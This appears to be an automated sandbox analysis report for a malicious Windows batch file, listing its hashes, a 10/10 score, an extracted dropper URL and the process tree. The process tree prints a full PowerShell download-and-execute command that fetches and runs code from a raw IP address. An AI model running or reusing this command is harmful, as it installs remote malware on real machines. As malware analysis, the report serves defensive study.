Analysis
-
max time kernel
128s -
max time network
116s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
04-06-2020 22:10
General
-
Target
bef69b68e4cea8e3eefee8da26543509.bat
-
Size
220B
-
MD5
f506edf0fe02fe851c4ad75db6112399
-
SHA1
583ba0b7f8553e3ea3adf90de4f1750e8d989390
-
SHA256
f6d98f99d70c4be05421f3c7fddc98c074854a0e6a38659100f275804a5c187e
-
SHA512
db82f1056a21ebf451fb3bc400daf9efd94c43110f256c74653bc68f7c113a4d93e1c633c084a687cb42d391875c026fa643c221ccb1126ead3bf2d7cfaa3619
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\bef69b68e4cea8e3eefee8da26543509.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bef69b68e4cea8e3eefee8da26543509');Invoke-YKHKXOBCRZILZ;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB